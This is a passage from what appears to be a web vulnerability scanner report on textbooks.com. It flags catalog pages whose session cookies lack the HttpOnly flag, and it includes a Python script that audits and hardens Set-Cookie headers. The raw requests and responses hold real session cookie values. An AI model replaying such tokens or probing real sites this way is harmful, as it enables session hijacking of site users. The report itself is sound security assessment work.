Set-Cookie: TBSESSION=wVCAnSNMnugJPpqPvFnYLMkeWndthnmqOhEEEMhiZx7wwIrip2hgQbExDho5rACzBkbkz%2B3tboQXXlEDqY88uSi9toJS5amCgvJPhU4%2B6u9GSdi8%2BPyG%2FPHQvDdA4iaiM3q14eVdOOwqGm9iho7gvHyDXRxe4e8yVF5u%2BLLtpF%2BNU9xtvy8uIaYtSKwPHOXe95vJZ2sxZ61yI4Vil5U6Xm6KDiMccJ5ge%2B9E9bjkdpVc0NujtdUwLCCL3z47t7PtcP4msfxpne4hgQ%2FYWGoFG9MoHHDeLG6luMmQtuxDrxl3MR9%2FAtb4xeckgUoU44e9SBigB344iGRmTf%2BtNjNfC0ykRdE6VebMxy6jhHj9gJBJsgt2ntC713Paqp3C%2FJAUgP0Br3ythzZAz7D6iFMtMNBzDo4Fl4xEuitZ2lOR7sXmQietPoNi1WISNuxDA3icHt1jTdPegalrRpEOjCmezWLHTNmCa0b1Qyr4ttsiU0p57ceZSAYRXXLoKMcL0zlkYnxPefNKQEVldegCt8IiE3D6VSetpkpM0C%2Fw9uwRe1L%2BeeaNNQZOCg1UmKrg92X8Nq3rzRqwZ48mZ8FbhxwZmmYSH44A9%2BSsUgoj6D4d4acf2cz2kIKi%2B8jLdUfP%2B0Ps6wpjtrbRhL%2FLDs7FEVzfy2BgzumkfGlb%2Bdc4cX3MrlwJNwTUp2qBlPFz8yAEmKxgET5qgaqGUPyX9U%2BMyc8kDwxtK5wyU%2FY1AQEzWn6WaFz%2Fe2iFwZKmDXUKmphRky1llznv%2BlpxbUSqLjBMUGG0scgpl5cZM3yhD7J0OKv4N%2BYEXkTZEFCHS5nkl%2BOo4FouixU%2BYQdKUi%2BmVxi%2BUvD9w1aYsjz6%2BNoMycuC4w%2BeDttlVLzyrLIjJq%2FibjXg72tvZAHkgRCGVL79zhZdj%2BNJxB%2BdE%2BD063jHaMboSA00YzWTOxLBG0Y1T0FI3DDr945czdlm%2FhXsxYdsUWGBE78jwuCvv4uyrPPUy2MSA0%2BY3S%2BQbz1HW7RDjRpTR%2Bu8iklBcRjxymy2ni4%2BibkO%2FBu%2B%2FEg2YATkLrcAwAvPMsssQFrbB%2FBZknDBAdfO%2FeIGdcFruitxdNw%2BBgS9C4Yem0urLAM1Ufx98XKKFEOg6KItVaExFRTJpUJBDEx3e9izECdNY5EJz2AdN3BbCdgCVZCjIlD78CQcgQQljR6vOrpi8pYFeBJ7t9G0rvLfZdyljwoeXFt0xiVNXwNwwb6U2hZEewgXRtwsR%2FYbzDj2xs%2Fx2V2q%2Fz9nRSUpCrtZ%2FMw%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=H2iNa2p5mG9uGr594ec%3D; expires=Mon, 26-Dec-2011 13:52:01 GMT; path=/; domain=.textbooks.com
Content-Length: 125397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/J/Law-and-Criminal-Justice.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/J/Law-and-Criminal-Justice.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=GiHxY1D3cco5MVEkJIPPzVJuChM3fY39LY0RqwQktwWvsjTa0JW2BsknacfepGmlFDIZbbqDxckkx7cS%2B2gpBVd81euP6li0UkLy4rhaA%2Bodl97BdkV%2FNWgvhpwdKClEa6%2BAtfXODXEjew%2B9zK8CWS0yYQk57HF%2FnqvaSCctClM%2BIvvJZqIx%2FeNhi2pB7ep4zZ2njrU6BryD7vlbHDKSWd0bp4zA9mC8VfRHw0tVL3BBHcm2uY9Sevw5VFDyiGx1OEqQrxHi6tAC4D1DuZrcv4DzoyNLtKQWJuWID%2F5qJhubasF%2Bm28PpefqDT5cYODfBNRkKZmIa%2FUFQ%2FX2Qbr8CP0VhjYF12bO%2BxxTRKvAcqkXYmALAwnnee4IcJUVSicNatp1mwue8oTX1n7YFTQB10OyP3whu4fkDusZhf9pCKxG9JYbsFbb3dIFtzrtS74XTNXHE%2BomeT%2FLpL4ivx2QD02pSPCb%2BWPNQAe23fmkcONLpzuY6Omfgsdh3paEJb6jYOVvb9mjERi6Df9TXSE1OT98M2ca%2F0KExDmuLmLdIfNWK7vm%2FG2uznIQv8oNMt3K4uJ0j%2BMxdyKq0lkgnm3300m7McnZyQV%2BwpM%2BOCXdpyrkzniMBkmcs%2BjGbxYVr%2FSqNHtICgvpQIiu6ijTVrgTyT2fL2W0kliEQ0dHSxptuAICRwjSSUwbngIp3YgysuskgApfkMVgGvmOvFrDXf6bZ56tc01ItN%2BSIl8BuFqDlUeo5dtF2e8GUy3g5%2BNGkwId%2B%2BgUojbARJE2QQDDy1zdhAEjPbyXyMHTLA%2FJ6CU1crFQtGgYSbHQJDEArhhh1OLIsN9HSIOM9YX4IpDgE8zq0Vx2SdjrD74pL%2FxsdepKhsGQH6vOGMcv8JAEoHcNg1qtYDsU%2BRDQf7MmtzllrDVWi8FyM7nL63JML1PYKJu0RgPh935Po%2B1rYA%2BOCQgs8WMMhIODH77ncgKZ1v8MHkCe3SOzwSoWTaYOwcukdGlwbQE2Di9t1zECsrDQHQEScSodmEpNcDKuJroACTyFrDWhR4AV1Qtcli8UoAmW0T0wrX7O9%2FcsTGZFbaYdfw%2FWPpdq6zCXpj9%2FFdLOQroa6wGM88lqtvUZfEQU3XiZcChM7vky1TwVEf6XoBbuAtAiNO4JVrBOynByFkyFhRWgQTVGuzS323Qbx8nx8rqbA6zSxvUd%2FNUrxyBGaWeRe5N6OzorGK96RwA9bGF57MwpWxOX15ngqzMBLXcGiwGBlVkUjo%2FjUYwl0eyDR9%2B22xI%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=f39%2Fcfnu9ABQ2dwwkCM%3D; expires=Mon, 26-Dec-2011 13:52:15 GMT; path=/; domain=.textbooks.com
Content-Length: 146725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/L/Languages-and-Literature.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/L/Languages-and-Literature.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=fG72Ywc0mypIeiUOVirDicOhdEiMF9lcHZcxvnN9IfzPHM7%2Fdj6%2Bxzm2f0ExlpWk4NOHPwyiv2FQjPkEPftsUH444oS5QEj%2F7FcoUz%2F2UiarYADCZBV7bvB3t5em%2FkVyJAd13MqPgRmdN2unHuNkWq9c%2F9dHAypavFCO6mEdofd1xL1RzdrXOI7y54sKeTyeqsSLcpiM0yw3lM%2Fl7pIsuPDE51V882MXAvAFaGcuq4oSE1p54pfpDlab5dOH%2F4NwnOo%2FoPR9mR4uKgizRaHMEfKeq8uePaO18QCdSAVHwGHiEHGPifga%2FilOSfknVYckULN12xqKaHN9wmROhId29IVAbZVf%2FWs9FTdrgnTc0sIVJH1b%2FyGV6M%2Fx7aJSPtZmpBbe9vKoCIk03t8P6P5H6z89b90540ITX%2BDzPg7nPblJrmhTlDQLUmFTM%2BqIVOs37TM2UIqGD24KmfexRXtcqEYwVdJ21gHCCRYTS9WyfWfzjON%2FQ0KAoZeMJsMlq0UsCFnJpmJqvGFORGTo1rnW2zOukOBvEllteDcqTU1q%2F%2F962rv93ZZ5vqDyhd%2FCUiCPa59XC%2Bn1JaiuiwlaZTZb%2B%2BArlq%2FwRRJgGrBzun%2BnCmsdVfGKn%2FWbd3pRcSA26F%2F39rjk0iSmvFHv8wa2FfpqH7nrqzrliOwI6qBbrkxrmFOoMnw1dZqVWZ4bb2Kfdxiy17Xo54RGASv10NyRfy%2BxNlpdpE4gPFJ2D0oJiUJgw96ju5zbbWWJg%2BAvVuMOQtxANnyUh8UlAxmfQnFx07C5io5AUYQLOI%2BoVD9dlQ8iEPMFE3KsPPH6madVkp5cTgPNWZXrbsoREQE88WSqo84sVQdSCp4IGUUuYx5Tamm8K5NYWfp4u1Xl1%2FCA1AiZqK%2BuWauYeTfEYgpjvbRaOTe41ZI31yjXfm9COC9PrMxQ9ErUmiZTBatdCSjZm6ppWKahFzB4eRopdj8pMlfqYQEH1iIsh3x1nHkCohb9Uh%2FD4m44o%2F13bg%2FyvaW9bPkF1IWVpPHxfkRlWqleiApjRZKmq6d53e28A4aMRtQ3NA8n%2F35Bu2jPSNcVbltPAFqXUMxQxeBcLO7Tk4wzYbu3Vn5JTsBORC2Qgk7G4a4bACsuyrCcH3zK089TfsN6WRQL7W3HTmNTgvaVDOTNRLDM9EvnASzyZ%2Btl9bPGmSxspfpY%2B%2BKX42HaojTJAQpfsRM4F5PpT0TfOkPuEO9ngIzhsYMyogEE%2FZUZp1ZCkzpFSr8sj74FUoPB3ZkZ9wgxwPM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=WoYEsU7gFTAI7ua5Jys%3D; expires=Mon, 26-Dec-2011 13:52:14 GMT; path=/; domain=.textbooks.com
Content-Length: 117783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...
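The two Set-Cookie headers in the response above can be checked mechanically rather than by eye. The following Python script is an added example for this report, not scanner output and not code from textbooks.com: it parses a raw HTTP response head, reports which cookies lack HttpOnly (and Secure, when the site is served over TLS), and shows what the hardened header value would look like. The response head it runs on is constructed here from the shape of the headers above, with the long cookie values shortened to placeholders.

```python
"""Audit Set-Cookie headers for the HttpOnly and Secure attributes.

Added example for this report. The sample response head below is
constructed from the shape of the headers recorded above; the cookie
values are shortened placeholders, not the real tokens.
"""

# Constructed sample: same header layout as the recorded response,
# with cookie values truncated to "...".
SAMPLE_RESPONSE_HEAD = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Powered-By: PHP/5.2.13-pl0-gentoo\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: TBSESSION=fG72Ywc0...; domain=.textbooks.com\r\n"
    "Set-Cookie: TBPERSIST=WoYEsU7g...; expires=Mon, 26-Dec-2011 13:52:14 GMT; "
    "path=/; domain=.textbooks.com\r\n"
    "Content-Length: 117783\r\n"
    "\r\n"
)


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attributes).

    Attribute names are case-insensitive per RFC 6265, so they are
    lower-cased; flags such as HttpOnly that carry no value map to True.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue  # tolerate a trailing ';' as seen in the request Cookie line
        key, has_eq, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_eq else True
    return name.strip(), value, attrs


def set_cookie_headers(raw_head):
    """Return the values of every Set-Cookie header in a raw response head.

    Splits on the first ':' only, so the colons inside an 'expires='
    timestamp do not break the header value.
    """
    lines = raw_head.split("\r\n")
    return [
        line.split(":", 1)[1].strip()
        for line in lines
        if line.lower().startswith("set-cookie:")
    ]


def audit_cookies(raw_head, over_tls):
    """Map each cookie name to the list of protective attributes it lacks.

    Secure is only reported when over_tls is True: on a plain-HTTP site
    (as in this report) a Secure cookie would never be sent back at all.
    """
    findings = {}
    for header_value in set_cookie_headers(raw_head):
        name, _, attrs = parse_set_cookie(header_value)
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if over_tls and "secure" not in attrs:
            missing.append("Secure")
        findings[name] = missing
    return findings


def harden(header_value, over_tls):
    """Return the Set-Cookie value with HttpOnly (and Secure, if over TLS) appended when absent."""
    _, _, attrs = parse_set_cookie(header_value)
    out = header_value.rstrip("; ")
    if "httponly" not in attrs:
        out += "; HttpOnly"
    if over_tls and "secure" not in attrs:
        out += "; Secure"
    return out


if __name__ == "__main__":
    # The recorded request was plain HTTP, so only HttpOnly is in scope here.
    for cookie, missing in audit_cookies(SAMPLE_RESPONSE_HEAD, over_tls=False).items():
        status = "missing " + ", ".join(missing) if missing else "ok"
        print(f"{cookie}: {status}")
    for header_value in set_cookie_headers(SAMPLE_RESPONSE_HEAD):
        print("hardened:", harden(header_value, over_tls=False))
```

On the sample both TBSESSION and TBPERSIST come back as missing HttpOnly, which is the finding the report records. For a PHP 5.2 application like the one behind the X-Powered-By header, the server-side fix is the `session.cookie_httponly` ini setting (or `ini_set()` of it before `session_start()`) for the session cookie and the seventh `$httponly` argument of `setcookie()` for cookies set by hand; both exist from PHP 5.2.0. Two caveats: HttpOnly only stops script from reading the cookie, so an injected script can still issue authenticated requests from the victim's browser, and the Secure attribute is out of scope until the session is moved off plain HTTP.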

4.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/M/Math-and-Science.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TBSESSION and TBPERSIST (see the two Set-Cookie headers in the response below). TBSESSION, by its name, appears to contain a session token, which increases the risk associated with this issue: without HttpOnly, any script running in a page on this domain, including script injected through a cross-site scripting flaw, can read the cookie through document.cookie and send it to an attacker. Review the contents of the cookies to determine their function.

Request

GET /Catalog/M/Math-and-Science.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=sRYyuJOpJ49sOCeckknOc8%2Fcs7RloEdBrMTr%2BX3T%2Bk%2Fv5pt27NdGyXLZyzHucDE8rXw4%2BfXsIr%2BCpN%2FCtHnuYa3NhYsfMh1QILSzU0MQIwQSWjzH5ToSGVnucX%2FtpdrAFMOj40dnQIioGkv0lpLlh2CtLgep8EcFQkfDXd37cLPs%2F5o4moXMvG1hY%2FbOER3D8irgpVWkuKtwTW0gZlJICUzR7Oim3d7liJhxzJRh58EQ8TeQF49kQik%2B2Pbf%2F6iOUswk13E3R98PHRxmemNdFbEzMQY7sP6LnVqvP20o3LEBQJ909k2KRX5f0sWvYiQ4KUC6qfPO99mDNegJMJWUKpPxiHIhJMTIROOzS6bsKoXb%2BvPsP%2FP03aFufgrd9rpQ98wYCRLSKVp7jJHiJKkZum3qkL03Q8x5xMjayRIZYSFjKoFzRnUPA9sws2plGK0DGgcF0hozx64Ui7XNou1VK7rjpta3BzKYl%2FZ3rWS0xgA9ui8uEG9w%2F%2FS1iwAQFXhbClubDGgBSWowXccDFQ6DLQJrPF6B2%2BqP2JO%2BSwAridOtOG5%2F2%2BxIu%2Frn46TQJ6rSxOPo0APQEJDeF9TjV0%2Fi6APMF%2F3NxURl%2Bkec6xnuRS%2BE%2BHEkwzDXMWkB%2FEl%2FgzpR1LDtO%2F5ngIlCKnsVkA0dvevJ9c5zYJuqsIBqxqa1XgiWjtXPKZ3ZjDSuiD0llOGuAuphsEA1Yud9z80eI3Q9ZOpWewU2MCt0ZZr%2Bsx%2Flr2atJm%2FxXiCajcLKoUvr%2B9cZn%2BF8TxjgxpW6IKoDYHZgvnKORQGFMkhNDX3gvCyMx50hbSffl8DAsRJ%2Bf4a%2BJLjp7AM8ZspOEc49d4eQTnb6JfEaWVHdBb46O1cs9zuiML%2FK1a4i9ejOJ0qnkaYq8G2xDWH8OATLTwnJVfLGfQSCPmeq8N%2FPLFNHozymdd%2FHoE0WPkEKlHtqjdmul2aFkV9xnXsnVgFGvVA7b4D5urcsmpRWX6ICBAYhWCl2IUfMwwFkgRlEu9fkC7Ei5P6ZVAuzjxTlz5gCui5CrEHqqRXT3b4NdXcpJRhQ9EagWvIhwfj4YnUzAuKByVFMouxFQ3D5np%2F2qYDux1fTn3nDdYxKKtzdYucTC5rC4W7NorEgxxk9oe5HyJ8TaWzd%2FAFnPtmL496iB%2BX%2BQnOVeu0viFPg8vSqeB1WbskKzuPDZ%2F5bS7WGLtt3dXY1FF5UtHoAl5rPM8e%2FDm%2FGbFP2LhOgr%2FZNbbfNBaPjEjC8ZgxgtIRAENMKOVS0CmSPihhzINs%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=RtMIGQwLOLtYgRObJxw%3D; expires=Mon, 26-Dec-2011 13:52:13 GMT; path=/; domain=.textbooks.com
Content-Length: 131056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.17. http://www.textbooks.com/Catalog/P/Medicine.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/P/Medicine.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TBSESSION and TBPERSIST (see the two Set-Cookie headers in the response below). TBSESSION, by its name, appears to contain a session token, which increases the risk associated with this issue: without HttpOnly, any script running in a page on this domain, including script injected through a cross-site scripting flaw, can read the cookie through document.cookie and send it to an attacker. Review the contents of the cookies to determine their function.

Request

GET /Catalog/P/Medicine.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; 